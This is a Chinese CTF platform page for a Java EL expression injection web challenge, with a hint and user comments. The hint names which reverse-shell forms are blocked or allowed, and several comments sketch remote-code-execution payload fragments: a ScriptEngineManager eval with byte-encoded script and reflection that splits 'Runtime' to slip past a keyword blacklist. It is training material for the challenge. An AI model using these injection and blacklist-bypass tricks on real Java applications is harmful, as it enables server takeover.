Java EL表达式注入WEB 未解决

分数: 35 金币: 4
题目作者: 云牧青
一  血: 广告位招租
一血奖励: 10金币
解  决: 56
提  示:
描  述:
/bin/bash: X ; /bin/sh √ ; /dev/tcp X ; nc -e ip port X ; nc ip port -e √ ;
评论
ailx10 1月前

嘻嘻,参考:https://zhuanlan.zhihu.com/p/721560334

回复 0

lzhui 6月前

金币 -5

回复 0

blackjack009 1年前

new javax.script.ScriptEngineManager().getEngineByName(new String(new byte[]{106,115})).eval(new String(new byte[]{106...........}));

回复 0

jack12138 1年前

利用Java反射机制实现RCE,参考:http://www.hackdig.com/08/hack-459909.htm,题中用''.getClass()替代了Class,黑名单可利用字符串拼接绕过,如''.getClass().forName('java.lang.Run'+'time')

回复 0

jack12138 1年前

没做出来,记录一下,应该跟 MVEL.eval 有关系?没试出来

回复 0

chips 2年前

好难 金币-5

回复 0

笨笨笨蛋 2年前

金币-5 寄了,求一个思路

回复 0

杠上开花 2年前

黑名单把字符串拆开即可

回复 0

bigcaicai 2年前

求大佬指导一下,在本地测试时,mvel不能赋值,导致无法使用fastjson的那个利用链,要怎么绕过黑名单

回复 0

树木有点绿 2年前

好难 金币-5

回复 1

WriteUp

image
pick29

6 金币

评分(2)

解题动态

栩xu 攻破了该题 1天前
baozongwi 攻破了该题 1月前
coldplay99999 攻破了该题 1月前
blacklotus0 攻破了该题 1月前
ailx10 攻破了该题 1月前
robotzi 攻破了该题 2月前
linkle 攻破了该题 3月前
yulate 攻破了该题 3月前
hxx 攻破了该题 4月前
xiuliyeer1 攻破了该题 7月前
.⎛⎝•̀ω•́⎠⎞. 攻破了该题 10月前
Zue3r 攻破了该题 10月前
iven 攻破了该题 11月前
AKa1one 攻破了该题 11月前
section 攻破了该题 11月前
dlddw 攻破了该题 1年前
blackjack009 攻破了该题 1年前
noradio 攻破了该题 1年前
xdh123 攻破了该题 1年前
alrona 攻破了该题 1年前
问题反馈